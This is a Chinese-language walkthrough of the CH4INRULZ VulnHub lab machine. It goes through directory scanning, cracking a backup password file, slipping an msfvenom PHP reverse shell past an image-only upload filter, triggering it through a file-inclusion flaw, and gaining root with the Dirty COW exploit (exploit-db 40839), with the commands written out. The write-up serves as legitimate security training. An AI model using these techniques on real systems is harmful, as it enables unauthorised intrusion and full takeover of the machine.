vlunhub系列之CH4INRULZ
CH4INRULZ
主机发现nmpa扫描
这里开放80我们去看看,并没有可以利用的,我们进行目录探测,将8011也进行探测
这里有一个development目录我们可以去看一下
这里需要用账户名密码
我们使用dirb扫描出有一个
.bak文件我们去访问
这里好像有关于密码的东西,我们对他进行破解
得到账号是frank 密码是frank!!!
这里登陆进来,这里发现有一个上传的单词,所以这里应该是有一个上传的路径,使用uploader
这里可以上传文件,我们可以上传一个webshell反弹,或者使用一句话木马,连接!
这里我们只是允许jpg jpeg png 以及gif的文件,所以我们可以进行一些操作
这里成功的上传,这个时候我们需要将传入的参数写成webshell即可
这里我们使用msf生成php的反弹shell然后将其上传
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.12.20 lport=4444 这是反弹shell
我们将其传入即可
这里我们成功的传入,并且名字为bbb.gif
这里我们只需要找到我们传入的webshell即可!
这里我们发现8011端口下有一个api接口
这里有一些用来连接frank服务的api接口
由于我们传入的文件所以使用file_api.php
这里说没有传输file传输,所以这里需要一个传入的参数,我们可以使用file试试
这里不知道参数可以使用bp爆破,或者fuzz爆破
很简单就可以测试出来
然而这里给我们的回显示错误的输入,那么我们传入的参数应该是没有错误的,只是请求方法的错误,我们给他改成post试试
那这里很没明显就是存在一个文件包含漏洞了 所以只要可以包含我们刚刚传入的文件这里就可以得到shell
这里我们找路径可以用apache的配置文件
/etc/apache2/sites-enabled/000-default
访问一下看
这里还有一个upload.php 我们可以加上这个
这里我们发现回显中是前端的html代码!
很明显这里就是将php代码执行,所以我们用php伪协议,将其源码拿下!
这里我们发现一个target dir ,这个就是上传目录! 我们可以访问
成功找到!我们可以先建立监听!
接着我们可以直接打开bbb.gif
这里我们发现并不会执行,所以我们需要利用文件包含漏洞,让其当做php代码执行
这里先用伪协议看一下 源码确定是我们的代码只有直接执行
这里发现确实是我们写的木马,所以我们可以直接执行
这里我们可以看到已经执行成功,我们看msf是否建立连接
msf也成功连接
但是这里并不是root,我们需要提权
这里我们发现版本号以后可以使用脏牛提权,我们直接search
这里使用40839
find / -name 40839.c
/usr/share/exploitdb/exploits/linux/local/40839.c
我们可以直接使用msf将其上传到/tmp目录中
meterpreter > upload /40839.c /tmp
[*] uploading : /40839.c -> /tmp
[*] uploaded : /40839.c -> /tmp/40839.c
meterpreter > ls /tmp
Listing: /tmp
=============Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 4814 fil 2022-12-01 05:47:05 +0800 40839.c
041777/rwxrwxrwx 4096 dir 2022-12-01 04:33:12 +0800 VMwareDnD
100644/rw-r--r-- 1860 fil 2022-12-01 04:33:13 +0800 _cafenv-appconfig_
将其编译即可
gcc -pthread 40839.c -o niu -lcrypt
进入shell环境执行即可
这里就出来一个niu
直接执行,输入密码即可
这里输入123之后生成了一个firefart的用户是root的权限
这里登陆成功
成功拿下!
希望对各位有所帮助看,后续靶机持续更新中!
vlunhub系列之CH4INRULZ相关推荐
- 妙用postman系列——postman建组、分享
妙用postman系列--postman建组.分享 添加新的组和请求. 3.生成分享链接 4.导入分享链接
- java 手编线程池_死磕 java线程系列之自己动手写一个线程池
欢迎关注我的公众号"彤哥读源码",查看更多源码系列文章, 与彤哥一起畅游源码的海洋. (手机横屏看源码更方便) 问题 (1)自己动手写一个线程池需要考虑哪些因素? (2)自己动手写 ...
- RabbitMQ 入门系列(2)— 生产者、消费者、信道、代理、队列、交换器、路由键、绑定、交换器
本系列是「RabbitMQ实战:高效部署分布式消息队列」和 「RabbitMQ实战指南」书籍的读书笔记. RabbitMQ 中重要概念 1. 生产者 生产者(producer)创建消息,然后发送到代理 ...
- Bert系列(二)——源码解读之模型主体
本篇文章主要是解读模型主体代码modeling.py.在阅读这篇文章之前希望读者们对bert的相关理论有一定的了解,尤其是transformer的结构原理,网上的资料很多,本文内容对原理部分就不做过多 ...
- Bert系列(三)——源码解读之Pre-train
https://www.jianshu.com/p/22e462f01d8c pre-train是迁移学习的基础,虽然Google已经发布了各种预训练好的模型,而且因为资源消耗巨大,自己再预训练也不现 ...
- 最优化方法系列:Adam+SGD-AMSGrad 重点
https://blog.csdn.net/wishchin/article/details/80567558 自动调参的Adam方法已经非常给力了,不过这主要流行于工程界,在大多数科学实验室中,模型 ...
- 边端云处理器系列技术参数
边端云处理器系列技术参数 锐捷RG-CT7800系列云终端 基于兆芯开先® KX-6000系列处理器 特点: • 小身材 • 大能量 • 2.4L 机箱容量 • 强劲计算性能 简介: • 8核2.7G ...
- Camera系列规格参数
Camera系列规格参数 FH8858V200: 新一代8M高性能网络摄像机 SoC FH8858V200是新一代面向8M专业型网络摄像机应用的高性能H.265/H.264/JPEG SoC芯片.芯片 ...
- GeforceRTX系列参数对比
GeforceRTX系列参数对比
最新文章
- linux ora27040,使用RMAN recover database时遇到ORA-01119 ORA-27040 错误的解决办法
- TSPL学习笔记(1)
- Linux2.6中的Slab层
- 使用yum时,保留下载包设置
- 共享童车,怎么还没火就凉了
- Keras梯度累积优化器:用时间换取效果
- 一个div压在另一个div上面_【CSS小分享】用CSS画一个新拟态风格键盘
- java access 不在本地_线上的java项目访问不到线上数据库,但是这个数据库我本地可以连接到,求解...
- C++类继承内部类实例
- Java程序员校招蚂蚁金服,大专生出身,做Java程序员真的没有春天吗
- taro 请务必在小程序页面中完善页面基础信息_如何一人五天开发完复杂微信小程序...
- bcd转ascii码 流程图_十进制ASCII与BCD码转换程序清单
- Anaconda2020安装与使用
- 闭关之 Vulkan 应用开发指南笔记(二):队列、命令、移动数据和展示
- 用 Python 玩视频剪辑 让生活简易化
- 第03章 Python的数据结构、函数和文件--Python for Data Analysis 2nd
- CleanMyMac X是干嘛的?及最新版功能介绍
- 我是程序员,如假包换——如何用一句话证明你是程序员?
- 实景三维如何助力智能应急?
- ZoomIt快捷键 win10
热门文章
- ROS Navigation-----TF配置
- 30个景观网页设计举例
- 【计算机网络】CSMA/CD协议
- 【1106. 解析布尔表达式】
- Ipad2022适用的电容笔有哪些?双十一性价比高的电容笔推荐
- 儿童网站成虚拟掘金热最新一站
- GEE上传矢量文件失败
- oracle.dataaccess 连接池,Oracle ManagedDataAccess - 连接请求超时 - 合并
- Vue自定义指令注册
- 基于改进的k最近邻算法的单体型重建问题An Improved KNN Algorithm for Haplotype Reconstruction Problem